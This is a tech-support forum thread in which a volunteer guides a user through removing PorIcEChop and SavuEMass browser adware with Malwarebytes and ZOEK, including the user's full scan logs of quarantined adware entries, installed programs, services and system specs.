Jump to content

Help! Infected with PorIcEChop & SavuEMass browser virus


Recommended Posts

I have Webroot and Malwarebytes and so far I still have the PorIcEChop & SavuEMass virus in both Chrome and Firefox browsers.  I have checked I.E but I don't see it there.  I keep deleting PorIcEChop & SavuEMass; they keep popping up.

 

This virus keeps putting Orange double underlines under certain key words for advertising.

 

Please advise.  Thank you.

 

- fryerlawrence

 

 

 

 

Link to post
Share on other sites

Hello,
    
 
They call me TwinHeadedEagle around here, and I'll be working with you.
 
    
 
    
Before we start please read and note the following:
    
icon_arrow.gif Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
icon_arrow.gif Please be patient. I know it is frustrating when your PC isn't working properly, but malware removal takes time.
icon_arrow.gif Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
icon_arrow.gif Do not paste the logs in your posts, attachments make my work easier. There is a Attach Files option below which you can use to attach your reports. Always attach reports from all tools.
icon_arrow.gif Stay with me to the end, the absence of symptoms doesn't mean that your machine is fully operational.
icon_arrow.gif Note that we may live in totally different time zones, what may cause some delays between answers.
icon_arrow.gif Do not ask for help for your business PC. Companies are making revenue via computers, so it is good thing to pay someone to repair it.
icon_arrow.gif If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
    
icon_idea.gif I can't foresee everything, so if anything unexpected happens, please stop and inform me!
icon_idea.gif There are no silly questions. Never be afraid to ask if in doubt!
 
 
 
 
P2P/Piracy Warning:

  • If you're using Peer 2 Peer software such as uTorrent, BitTorrent or similar you must either fully uninstall them or completely disable them from running while being assisted here.
  • Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.
  • If you have illegal/cracked software, cracks, keygens, etc. on the system, please remove or uninstall them now and read the policy on Piracy.

 

 

 

51a46ae42d560-malwarebytes_anti_malware. Scan with Malwarebytes' Anti-Malware

Please re-run 51a46ae42d560-malwarebytes_anti_malware. Malwarebytes' Anti-Malware.

  • First of all, select update.
  • Once updated, click the Settings tab, in the left panel choose Detctions & protection and tick Scan for rootkits.
  • Click the Scan tab, choose Threat Scan is checked and click Scan Now.
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the newest Scan Log.
  • At the bottom click Export and choose Text file.

Save the file to your desktop and include its content in your next reply.

Link to post
Share on other sites

Malwarebytes Anti-Malware

www.malwarebytes.org

 

Scan Date: 7/29/2014

Scan Time: 8:21:20 AM

Logfile: 

Administrator: Yes

 

Version: 2.00.2.1012

Malware Database: v2014.07.29.03

Rootkit Database: v2014.07.17.01

License: Free

Malware Protection: Disabled

Malicious Website Protection: Disabled

Self-protection: Disabled

 

OS: Windows 8.1

CPU: x64

File System: NTFS

User: Owner

 

Scan Type: Threat Scan

Result: Completed

Objects Scanned: 319149

Time Elapsed: 13 min, 34 sec

 

Memory: Enabled

Startup: Enabled

Filesystem: Enabled

Archives: Enabled

Rootkits: Enabled

Heuristics: Enabled

PUP: Warn

PUM: Enabled

 

Processes: 0

(No malicious items detected)

 

Modules: 0

(No malicious items detected)

 

Registry Keys: 8

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\CLASSES\TYPELIB\{E2343056-CC08-46AC-B898-BFC7ACF4E755}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{9B41579A-1996-42F9-8F84-7B7786818CEF}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{9B41579A-1996-42F9-8F84-7B7786818CEF}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{E2343056-CC08-46AC-B898-BFC7ACF4E755}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

 

Registry Values: 0

(No malicious items detected)

 

Registry Data: 0

(No malicious items detected)

 

Folders: 2

PUP.Optional.MultiPlug.A, C:\ProgramData\PorIcEChop, Quarantined, [4859079995e60e283cdacefb43bf42be], 

PUP.Optional.MultiPlug.A, C:\Program Files (x86)\PorIcEChop, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

 

Files: 3

PUP.Optional.MultiPlug.A, C:\ProgramData\PorIcEChop\Pdw4RkEwMhi.dat, Quarantined, [4859079995e60e283cdacefb43bf42be], 

PUP.Optional.MultiPlug.A, C:\Program Files (x86)\PorIcEChop\wXgGsxssG8.dat, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, C:\Program Files (x86)\PorIcEChop\wXgGsxssG8.tlb, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

 

Physical Sectors: 0

(No malicious items detected)

 

 

(end)

Link to post
Share on other sites

Okay, we're going to run one more tool:

 

 

51a612a8b27e2-Zoek.png Scan with ZOEK

Please download ZOEK by Smeenk and save it to your desktop (preferred version is the *.exe one)

Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

  • Right-click on 51a612a8b27e2-Zoek.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Wait patiently until the main console will appear, it may take a minute or two.
  • In the main box please paste in the following script:

    createsrpoint;gpt.ini;z C:\Windows\System32\GroupPolicy;vC:\Windows\SysWOW64\GroupPolicy;vprocess;services-list;systemspecs;startupall;skipfix-iedefaults;firefoxlook;chromelook;filesrcm;installedprogs;
  • Make sure that Scan All Users option is checked.
  • Push Run Script and wait patiently. The scan may take a couple of minutes.
  • When the scan completes, a zoek-results logfile should open in notepad.
  • If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)
Post its content into your next reply.
Link to post
Share on other sites

Zoek.exe v5.0.0.0 Updated 28-07-2014

Tool run by Owner on Tue 07/29/2014 at 14:18:08.47.

Microsoft Windows 8.1 6.3.9600  x64

Running in: Normal Mode Internet Access Detected

Launched: C:\Users\Owner\Desktop\zoek.exe [scan all users] [script inserted] 

 

==== System Restore Info ======================

 

7/29/2014 2:19:13 PM Zoek.exe System Restore Point Created Succesfully.

 

==== Installed Programs ======================

 

7-Zip 9.20 (x64 edition)  

ABBYY FineReader 6.0 Sprint  

Adobe Flash Player 14 Plugin  

Adobe Reader XI (11.0.07)  

AI Suite II  

AMD Accelerated Video Transcoding  

AMD Catalyst Install Manager  

AMD VISION Engine Control Center  

ASUS Music Maker  

ASUS MX Suite  

ASUS Video easy  

ASUS WebStorage Sync Agent  

ASUSDVD  

AsusVibe2.0  

Audacity 2.0.5  

Bandicam  

Bandisoft MPEG-1 Decoder  

BurnoutT Paradise: The Ultimate Box  

Catalyst Control Center - Branding  

Catalyst Control Center InstallProxy  

Catalyst Control Center Localization All  

ccc-utility64  

CCC Help Chinese Standard  

CCC Help Chinese Traditional  

CCC Help Czech  

CCC Help Danish  

CCC Help Dutch  

CCC Help English  

CCC Help Finnish  

CCC Help French  

CCC Help German  

CCC Help Greek  

CCC Help Hungarian  

CCC Help Italian  

CCC Help Japanese  

CCC Help Korean  

CCC Help Norwegian  

CCC Help Polish  

CCC Help Portuguese  

CCC Help Russian  

CCC Help Spanish  

CCC Help Swedish  

CCC Help Thai  

CCC Help Turkish  

CCleaner  

Classic Shell  

CPUID HWMonitor 1.25  

D3DX10  

Dead SpaceT  

Dragon's Lair  

Dream Aquarium  

eManual  

eReg  

Firebird SQL Server - MAGIX Edition  

Galer¡a de fotos  

Galerie de photos  

Google Chrome  

Google Update Helper  

Java 7 Update 60  

Java Auto Updater  

LAME v3.99.3 (for Windows)  

LastPass (uninstall only)  

Lexmark Pro800-Pro900 Series  

Linksys Connect  

Logitech SetPoint 6.65  

Malwarebytes Anti-Malware version 2.0.2.1012  

MediaCoder x64 0.8.28.5588  

Microsoft Application Error Reporting  

Microsoft Flight  

Microsoft Games for Windows - LIVE Redistributable  

Microsoft Games for Windows Marketplace  

Microsoft Office 365 - en-us  

Microsoft Office Document Recrypt Tool  

Microsoft OneDrive  

Microsoft Silverlight  

Microsoft SQL Server 2005 Compact Edition [ENU]  

Microsoft Visual C++ 2005 Redistributable  

Microsoft Visual C++ 2005 Redistributable (x64)  

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17  

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17  

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161  

Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319  

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319  

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106  

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106  

Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.51106  

Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.51106  

Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.51106  

Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.51106  

Microsoft Xbox 360 Accessories 1.2  

Movie Maker  

Mozilla Firefox 31.0 (x86 en-US)  

Mozilla Maintenance Service  

MSVCRT  

MSVCRT110  

MSVCRT110_amd64  

MSXML 4.0 SP3 Parser  

MSXML 4.0 SP3 Parser (KB2758694)  

Need for Speed Hot Pursuit  

Need for SpeedT Rivals  

Need for SpeedT The Run  

Need For SpeedT World  

NETGEAR WNA3100 wireless USB 2.0 adapter  

Next Generation Visualisations  

NVIDIA 3D Vision Controller Driver 337.88  

NVIDIA 3D Vision Driver 337.88  

NVIDIA Control Panel 337.88  

NVIDIA GeForce Experience 2.1  

NVIDIA Graphics Driver 337.88  

NVIDIA HD Audio Driver 1.3.30.1  

NVIDIA Install Application  

NVIDIA LED Visualizer 1.0  

NVIDIA Network Service  

NVIDIA PhysX  

NVIDIA PhysX System Software 9.13.1220  

NVIDIA ShadowPlay 14.6.22  

NVIDIA Stereoscopic 3D Driver  

NVIDIA Update 14.6.22  

NVIDIA Update Core  

NVIDIA Virtual Audio 1.2.23  

OEM Application Profile  

Office 15 Click-to-Run Extensibility Component  

Office 15 Click-to-Run Licensing Component  

Office 15 Click-to-Run Localization Component  

Orbit Downloader  

Origin  

Peggle  

Photo Common  

Photo Gallery  

Plants vs. ZombiesT  

Ralink RT2860 Wireless LAN Card  

Realtek Ethernet Controller Driver  

Realtek High Definition Audio Driver  

Revo Uninstaller 1.95  

SAMSUNG USB Driver for Mobile Phones  

Secunia PSI (2.0.0.4003)  

Shared C Run-time for x64  

SHIELD Streaming  

Steam  

Tinker  

Webroot SecureAnywhere  

Why ASUS PC  

Windows Live  

Windows Live Communications Platform  

Windows Live Essentials  

Windows Live Installer  

Windows Live Photo Common  

Windows Live PIMT Platform  

Windows Live SOXE  

Windows Live SOXE Definitions  

Windows Live UX Platform  

Windows Live UX Platform Language Pack  

WinPcap 4.1.2  

Yahoo Messenger  

 

==== Running Processes ======================

 

C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe

C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe

C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe

C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe

C:\Program Files (x86)\Secunia\PSI\PSIA.exe

C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe

C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe

C:\Program Files (x86)\ASUS\AI Suite II\EPU\EPUHelp.exe

C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe

C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE

C:\Program Files (x86)\Lexmark Pro800-Pro900 Series\lxecmon.exe

C:\Program Files (x86)\Lexmark Pro800-Pro900 Series\ezprint.exe

C:\Program Files (x86)\InstallShield Installation Information\{E6931688-DA2B-4E16-8539-3D323D69C677}\AiChargerPlus.exe

C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

C:\Program Files (x86)\NETGEAR\WNA3100\WNA3100.exe

C:\Program Files (x86)\Secunia\PSI\psi_tray.exe

C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe

C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

C:\Users\Owner\Desktop\zoek.exe

C:\WINDOWS\SysWOW64\cmd.exe

C:\WINDOWS\SysWOW64\cmd.exe

C:\WINDOWS\SysWOW64\cmd.exe

 

==== Services (whitelist) ======================

Powered by E Dev

 

R2 - [AdobeARMservice] - Adobe Acrobat Update Service - "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"

R2 - [asComSvc] - ASUS Com Service - C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe

R2 - [asHmComSvc] - ASUS HM Com Service - C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe

R2 - [AsSysCtrlService] - ASUS System Control Service - C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe

R2 - [Asus WebStorage Windows Service] - Asus WebStorage Windows Service - "C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSWinService.exe"

R2 - [ClickToRunSvc] - Microsoft Office ClickToRun Service - "C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe" /service

R2 - [Fabs] - FABS - Helping agent for MAGIX media database - C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe /DisableUI

R2 - [lxecCATSCustConnectService] - lxecCATSCustConnectService - C:\WINDOWS\system32\spool\DRIVERS\x64\3\\lxecserv.exe

R2 - [NvNetworkService] - NVIDIA Network Service - "C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe"

R2 - [NvStreamSvc] - NVIDIA Streamer Service - "C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe"

R2 - [nvsvc] - NVIDIA Display Driver Service - "C:\WINDOWS\system32\nvvsvc.exe"

R2 - [secunia PSI Agent] - Secunia PSI Agent - "C:\Program Files (x86)\Secunia\PSI\PSIA.exe" --start-service

R2 - [stereo Service] - NVIDIA Stereoscopic 3D Driver Service - "C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe"

R2 - [WSearch] - Windows Search - C:\WINDOWS\system32\SearchIndexer.exe /Embedding

R3 - [VSS] - Volume Shadow Copy - C:\WINDOWS\system32\vssvc.exe

S2 - [gupdate] - Google Update Service (gupdate) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

S2 - [sppsvc] - Software Protection - C:\WINDOWS\system32\sppsvc.exe

S2 - [WRSVC] - WRSVC - "C:\Program Files (x86)\Webroot\WRSA.exe" -service

S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

S3 - [ALG] - Application Layer Gateway Service - C:\WINDOWS\System32\alg.exe

S3 - [COMSysApp] - COM+ System Application - C:\WINDOWS\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}

S3 - [Fax] - Fax - C:\WINDOWS\system32\fxssvc.exe

S3 - [FirebirdServerMAGIXInstance] - Firebird Server - MAGIX Instance - "C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe"

S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe

S3 - [gupdatem] - Google Update Service (gupdatem) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc

S3 - [iEEtwCollectorService] - Internet Explorer ETW Collector Service - C:\WINDOWS\system32\IEEtwCollector.exe /V

S3 - [LBTServ] - Logitech Bluetooth Service - C:\Program Files\Common Files\LogiShrd\Bluetooth\lbtserv.exe

S3 - [MozillaMaintenance] - Mozilla Maintenance Service - "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

S3 - [MSDTC] - Distributed Transaction Coordinator - C:\WINDOWS\System32\msdtc.exe

S3 - [msiserver] - Windows Installer - C:\WINDOWS\system32\msiexec.exe /V

S3 - [ose] - Office  Source Engine - "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"

S3 - [PerfHost] - Performance Counter DLL Host - C:\WINDOWS\SysWow64\perfhost.exe

S3 - [RpcLocator] - Remote Procedure Call (RPC) Locator - C:\WINDOWS\system32\locator.exe

S3 - [sNMPTRAP] - SNMP Trap - C:\WINDOWS\System32\snmptrap.exe

S3 - [steam Client Service] - Steam Client Service - "C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService

S3 - [TrustedInstaller] - Windows Modules Installer - C:\WINDOWS\servicing\TrustedInstaller.exe

S3 - [vds] - Virtual Disk - C:\WINDOWS\System32\vds.exe

S3 - [wbengine] - Block Level Backup Engine Service - "C:\WINDOWS\system32\wbengine.exe"

S3 - [WdNisSvc] - Windows Defender Network Inspection Service - "C:\Program Files\Windows Defender\NisSrv.exe"

S3 - [WinDefend] - Windows Defender Service - "C:\Program Files\Windows Defender\MsMpEng.exe"

S3 - [wmiApSrv] - WMI Performance Adapter - C:\WINDOWS\system32\wbem\WmiApSrv.exe

S3 - [WMPNetworkSvc] - Windows Media Player Network Sharing Service - "C:\Program Files\Windows Media Player\wmpnetwk.exe"

 

==== Folders Found ======================

 

 

==== Files Found ======================

 

 

==== System Specs ======================

 

Windows: Windows Version 6.2 (Build 9200)

Memory (RAM): 8137 MB

CPU Info: AMD A10-6700 APU with Radeon HD Graphics

CPU Speed: 3770.3 MHz

Sound Card: Sharp LC-32LB150U-4 (NVIDIA Hig | 

Display Adapters: NVIDIA GeForce GTX 660   | NVIDIA GeForce GTX 660   | NVIDIA GeForce GTX 660   | NVIDIA GeForce GTX 660

Monitors: 1x; Generic PnP Monitor | 

Screen Resolution: 1768 X 992 - 32 bit

Network: Network Present

Network Adapters: Microsoft Wi-Fi Direct Virtual Adapter | 802.11n Wireless LAN Card

CD / DVD Drives: 1x (D: | ) D: ASUS DVDRAM GHB1N

Ports: COM Ports NOT Present. LPT Port NOT Present. 

Mouse: 16 Button Wheel Mouse Present

Hard Disks: C:  913.1GB

Hard Disks - Free: C:  717.5GB

Manufacturer *: ASUSTeK COMPUTER INC. (Licensed from AMI)

BIOS Info: AT/AT COMPATIBLE |  | ALASKA - 1072009

Time Zone: Mountain Standard Time

Motherboard *: ASUSTeK COMPUTER INC. M11BB

Country: United States 

Language: ENU 

 

==== System Specs (Software) ======================

 

Anti-Virus: Webroot SecureAnywhere On-access scanning disabled (Outdated)

Anti-Virus: Windows Defender On-access scanning disabled (Outdated)

Anti-Spyware: Webroot SecureAnywhere disabled (Outdated)

Anti-Spyware: Windows Defender disabled (Outdated)

Default Browser: Google Chrome 36.0.1985.125

Internet Explorer Version: 11.0.9600.17207 

Mozilla Firefox version: 31.0 (x86 en-US)

Google Chrome version: 36.0.1985.125

Adobe Reader version: 11.0.07.79

Sun Java version: 1.7.0_65 (32-bit) 

Flash Player version: 14.0.0.145

 

==== Files Recently Created / Modified ======================

 

====== C:\WINDOWS ====

====== C:\Users\Owner\AppData\Local\Temp ====

2014-07-29 04:54:12 E3A25C80E2375B2D42C3D4729769BDF3 10240 ----a-w- C:\Users\Owner\AppData\Local\Temp\SDIAG_200651e0-ed3f-4f1d-9edf-39d9db6431cb\NetworkDiagnosticSnapIn.dll

2014-07-28 23:26:25 E3A25C80E2375B2D42C3D4729769BDF3 10240 ----a-w- C:\Users\Owner\AppData\Local\Temp\SDIAG_a4be0d3d-46b0-43c1-8804-007772ce60b3\NetworkDiagnosticSnapIn.dll

2014-07-17 17:32:56 F0862AA1A4E5D2E7A1A935737E3F2C6B 291184 ----a-w- C:\Users\Owner\AppData\Local\Temp\lu\2_spp_200006d.exe

2014-07-17 17:32:54 04349DB1919EDEE3DF40909776FD25AC 437512 ----a-w- C:\Users\Owner\AppData\Local\Temp\lu\1_spp_10000a2.exe

2014-07-17 17:30:13 7413397B938C6578D064CD72BF4308A9 81533904 ----a-w- C:\Users\Owner\AppData\Local\Temp\lu\1_spp_setpointp.exe

====== Java Cache =====

2014-07-21 22:14:09 87C8A2FB22129807F7FFF9E105856401 252799 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\b2facd-66899239

2014-07-21 22:13:53 BAD9BB7A4BF694A68A7704E5A55DA5D4 43720 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31\49fb225f-618ac822

2014-07-21 22:13:52 2D65E85EF7D762832423FFD1FBAFE842 325 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4\757c73c4-d0d1141df312931ffeb507c773ed3d9ffb8b62143f502cc6af32543ba0bff958-6.0.lap

2014-07-09 17:47:55 338FF0BBCD96F62A21017FE78F474B4B 265357 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45\7e60542d-1c279bb0

2014-07-09 17:47:53 0719A8334BEBACBFCA55555E98B66AB2 932 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47\15572e2f-547ad759

2014-07-09 17:52:11 0719A8334BEBACBFCA55555E98B66AB2 932 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58\31b19ba-5b4f7d29

2014-07-09 17:47:54 0719A8334BEBACBFCA55555E98B66AB2 932 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\2bbaaf87-1a3ffccb

2014-07-09 17:47:54 7A42F0F9912D6B17E0411E4380B4B472 106 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\2bbaaf87-e2e4c8970372d2fb4193a7ef29d16f6c3f08527947fcb9208b3a0e48820369fd-6.0.lap

====== C:\WINDOWS\SysWOW64 =====

====== C:\WINDOWS\SysWOW64\drivers =====

====== C:\WINDOWS\Sysnative =====

2014-07-27 07:06:28 BCCFB97B1B68DD18F2BDACFE37409386 716800 ----a-w- C:\WINDOWS\Sysnative\SkyDriveTelemetry.dll

2014-07-27 07:06:28 11FD8DDAB6014EECCE88F1F581604C30 1120256 ----a-w- C:\WINDOWS\Sysnative\SkyDrive.exe

2014-07-27 07:06:28 04142EC4BDD7F502922914F65A5EE1D1 4756992 ----a-w- C:\WINDOWS\Sysnative\SyncEngine.dll

====== C:\WINDOWS\Sysnative\drivers =====

2014-07-09 20:41:45 374E27295F0A9DCAA8FC96370F9BEEA5 563200 ----a-w- C:\WINDOWS\Sysnative\drivers\afd.sys

2014-07-09 20:41:41 1CD3A907D64D08F49208DA00B69BF35E 565576 ----a-w- C:\WINDOWS\Sysnative\drivers\cng.sys

2014-07-09 20:41:13 7A1A3F213CDB3363D179D5014272025D 402432 ----a-w- C:\WINDOWS\Sysnative\drivers\mrxsmb.sys

2014-07-09 20:41:12 674A4702E4E144E8710ED1A2EC6DD049 96768 ----a-w- C:\WINDOWS\Sysnative\drivers\agilevpn.sys

2014-07-09 20:41:12 65ED7B9CFEA893DF7748D5FF692690DE 38912 ----a-w- C:\WINDOWS\Sysnative\drivers\vwifimp.sys

2014-07-09 20:41:12 35BF5C5F5E3C9902C98978C7640574DA 71680 ----a-w- C:\WINDOWS\Sysnative\drivers\vwififlt.sys

2014-07-09 20:40:59 5C42CEE3E2018E1DFC6E3E17240A432A 206848 ----a-w- C:\WINDOWS\Sysnative\drivers\mrxsmb20.sys

2014-07-09 20:39:46 FE0ADF5028EB8C1339B66B3AEDE3FEF9 440664 -c--a-w- C:\WINDOWS\Sysnative\drivers\usbport.sys

2014-07-09 20:39:46 D537815E450A149752C15868392AD1F3 110592 ----a-w- C:\WINDOWS\Sysnative\drivers\WUDFPf.sys

2014-07-09 20:39:46 93435654DCA210298BA0F986EB51C679 419672 -c--a-w- C:\WINDOWS\Sysnative\drivers\usbhub.sys

2014-07-09 20:39:46 83C9C45D59C72FEFDAE9A5686BE31FEA 467800 -c--a-w- C:\WINDOWS\Sysnative\drivers\USBHUB3.SYS

2014-07-09 20:39:46 7CCBBCEE408A5DBE3FE47297DB5A6CFC 227840 ----a-w- C:\WINDOWS\Sysnative\drivers\WUDFRd.sys

2014-07-09 20:39:46 48BA326A3DBA5B5BEB5F2777F4618696 89944 -c--a-w- C:\WINDOWS\Sysnative\drivers\usbehci.sys

2014-07-09 20:39:46 25AC0B50A71938890970E1508F107196 2518360 ----a-w- C:\WINDOWS\Sysnative\drivers\tcpip.sys

2014-07-09 20:39:46 064260B3A5868AC894A4943543BC7AB7 37376 -c--a-w- C:\WINDOWS\Sysnative\drivers\usbuhci.sys

2014-07-09 20:39:45 D79920BE4E6683D3AB50F71457A4F6C6 27480 -c--a-w- C:\WINDOWS\Sysnative\drivers\usbd.sys

2014-07-09 20:38:40 8FCE57F7E5CDA5751FDE01A316180488 428888 ----a-w- C:\WINDOWS\Sysnative\drivers\FWPKCLNT.SYS

2014-07-05 20:00:46 8A50D5304E6AE48664CF5838EC32F647 122584 ----a-w- C:\WINDOWS\Sysnative\drivers\MBAMSwissArmy.sys

2014-07-05 20:00:31 9D9ED48F841EA37AA5310D54B9E5D3C7 91352 ----a-w- C:\WINDOWS\Sysnative\drivers\mbamchameleon.sys

2014-07-05 20:00:31 0664F6335F108F38FE08C3CA747311EE 64216 ----a-w- C:\WINDOWS\Sysnative\drivers\mwac.sys

====== C:\WINDOWS\Tasks ======

====== C:\WINDOWS\Temp ======

======= C:\Program Files =====

======= C:\PROGRA~2 =====

2014-07-21 21:01:35 -------- d-----w- C:\PROGRA~2\SavuEMass

2014-07-16 19:02:05 -------- d-----w- C:\PROGRA~2\COMMON~1\Java

2014-07-09 17:51:19 -------- d-----w- C:\PROGRA~2\Java

======= C: =====

====== C:\Users\Owner\AppData\Roaming ======

2014-07-21 21:01:47 -------- d-----w- C:\Users\Owner\AppData\Locallow\{26D46134-E7D9-B0E1-D3AC-35CE315423DC}

2014-07-21 21:01:36 -------- d-----w- C:\Users\Owner\AppData\Locallow\{C9EAD628-4A64-6AB3-116E-04E63EF48DFE}

2014-07-21 21:01:33 -------- d-----w- C:\Users\Owner\AppData\Local\Chromatic Browser

2014-07-21 21:01:33 -------- d-----w- C:\Users\Guest\AppData\Local\Chromatic Browser

2014-07-21 21:01:32 -------- d-----w- C:\Users\Owner\AppData\Local\Torch

2014-07-21 21:01:32 -------- d-----w- C:\Users\Guest\AppData\Local\Torch

2014-07-21 21:01:32 -------- d-----w- C:\Users\Administrator\AppData\Local\Torch

2014-07-21 21:01:32 -------- d-----w- C:\Users\Administrator\AppData\Local\Chromatic Browser

2014-07-21 21:01:31 -------- d-----w- C:\Users\Owner\AppData\Local\Comodo

2014-07-21 21:01:31 -------- d-----w- C:\Users\Guest\AppData\Local\Comodo

2014-07-21 21:01:31 -------- d-----w- C:\Users\Administrator\AppData\Local\Comodo

2014-07-21 21:01:29 -------- d-----w- C:\Users\Guest\AppData\Local\Google

2014-07-21 21:01:29 -------- d-----w- C:\Users\Administrator\AppData\Local\Google

2014-07-09 15:25:05 -------- d-----w- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome

2014-07-04 01:25:33 027030A68FCB9E2DFB70468822DC4E29 241 ----a-w- C:\Users\Owner\AppData\Roaming\MPUI.ini

====== C:\Users\Owner ======

2014-07-27 07:09:31 -------- d-----w- C:\WINDOWS\serviceprofiles\Localservice\winhttp

2014-07-21 21:01:55 -------- d-----w- C:\ProgramData\GreenBay App

2014-07-21 21:01:37 -------- d-----w- C:\ProgramData\SavuEMass

2014-07-21 21:01:37 -------- d-----w- C:\ProgramData\e646da9e30087882

2014-07-21 21:01:35 075B0DA82E23780FA2DD7F2EA0464FD4 258 --sha-r- C:\ProgramData\ntuser.pol

2014-07-21 21:01:29 -------- d-----w- C:\Users\Guest\AppData

2014-07-21 21:01:29 -------- d-----w- C:\Users\Administrator\AppData

2014-07-21 21:00:47 -------- d-----w- C:\ProgramData\InstallMate

2014-07-17 12:57:23 CC2037DD4492E96C0AED1783F5B0B2AE 895120 ----a-w- C:\Users\Owner\Downloads\ChromeSetup.exe

2014-07-16 19:02:02 -------- d-----w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java

 

